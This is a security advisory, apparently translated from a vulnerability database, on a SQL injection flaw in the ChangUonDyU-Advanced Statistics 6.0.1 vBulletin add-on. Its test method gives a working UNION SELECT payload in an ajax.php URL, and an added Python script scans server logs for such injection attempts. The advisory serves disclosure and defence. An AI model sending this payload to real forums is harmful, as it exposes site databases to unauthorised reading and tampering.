Release date: 2012-11-02
Updated on:
Affected Systems:
Hoiquantinhoc ChangUonDyU-Advanced Statistics 6.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56379
vBulletin is a powerful and flexible forum software suite that can be customized to suit your needs.
ChangUonDyU-Advanced Statistics 6.0.1 and other versions contain a SQL injection vulnerability. Attackers can exploit it to take control of the application, access or modify data, and exploit other vulnerabilities in the underlying database.
<* Source: Juno_okyo
Link: http://www.exploit-db.com/exploits/22429/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
http://www.example.com/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%,3,4,5,6,7,8,9,10--%20-&result=20
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Hoiquantinhoc
-------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
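
With no vendor patch available, web server access logs can be checked for requests to ajax.php?do=inforum whose listforumid value is not a plain list of numbers. The script below is an added example, not part of the original advisory or the vendor's code; it assumes a legitimate listforumid is a comma-separated list of numeric forum ids, that logs are in common/combined format, and it uses constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate listforumid is a comma-separated list of numeric ids.
VALID_ID_LIST = re.compile(r"^\d+(?:\s*,\s*\d+)*$")
# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_listforumid(target):
    """Return the decoded listforumid of an ajax.php?do=inforum request
    when it is not a numeric list; otherwise return None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/ajax.php"):
        return None
    params = parse_qs(parts.query)  # percent-decodes values, drops blanks
    if "inforum" not in params.get("do", []):
        return None
    for value in params.get("listforumid", []):
        if not VALID_ID_LIST.match(value.strip()):
            return value
    return None

def scan(lines):
    """Return (line number, client address, decoded value) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_listforumid(match.group(1))
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Nov/2012:10:00:01 +0000] "GET /f/ajax.php?do=inforum'
    '&listforumid=12,15,20&result=20 HTTP/1.1" 200 512',
    '192.0.2.77 - - [02/Nov/2012:10:00:05 +0000] "GET /f/ajax.php?do=inforum'
    '&listforumid=100%29%20UNION%20SELECT%201&result=20 HTTP/1.1" 200 734',
    '192.0.2.10 - - [02/Nov/2012:10:00:09 +0000] "GET /f/index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent listforumid={value!r}")
```

The same numeric-list rule can be enforced at a reverse proxy or WAF in front of the forum until a fixed version is published.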